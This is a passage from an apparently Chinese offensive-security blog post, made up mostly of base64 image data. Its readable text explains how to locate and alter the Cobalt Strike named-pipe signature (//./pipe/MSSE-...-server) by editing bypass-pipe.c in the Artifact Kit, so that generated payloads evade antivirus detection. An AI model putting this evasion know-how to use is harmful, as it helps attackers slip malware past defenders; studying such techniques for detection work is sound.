<p><img loading=lazy src="data:image/png;base64,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
</p>
<h5 id=0x03161-源码修改>
 0x03161 源码修改
 <a class=heading-link href=#0x03161-%e6%ba%90%e7%a0%81%e4%bf%ae%e6%94%b9>
 <i class="fa-solid fa-link" aria-hidden=true title="Link to heading"></i>
 <span class=sr-only>Link to heading</span>
 </a>
</h5>
<p>当然如果你追求完美，可以接着往下看，不过首先说明，<strong>通过套件的方式进行修改的只能在生成exe文件的时候有效，shellcode还是需要使用完成在内存进行加密</strong></p>
<p>首先先定位一下特征，我直接使用ida对该字节码进行搜索</p>
<p><img loading=lazy src=data:image/png;base64,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
</p>
<p>伪代码看一下，看起来是//./pipe/MSSE-随机整数-server的通道生成</p>
<p><img loading=lazy src="data:image/png;base64,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
</p>
<p>在CobaltStrike的<a href=https://www.cobaltstrike.com/blog/learn-pipe-fitting-for-all-of-your-offense-projects class=external-link target=_blank rel=noopener>博客</a>中有提到这个问题，指明了可以通过Artifact Kit中的src-common/bypass-pipe.c进行修改</p>
<p><img loading=lazy src="data:image/png;base64,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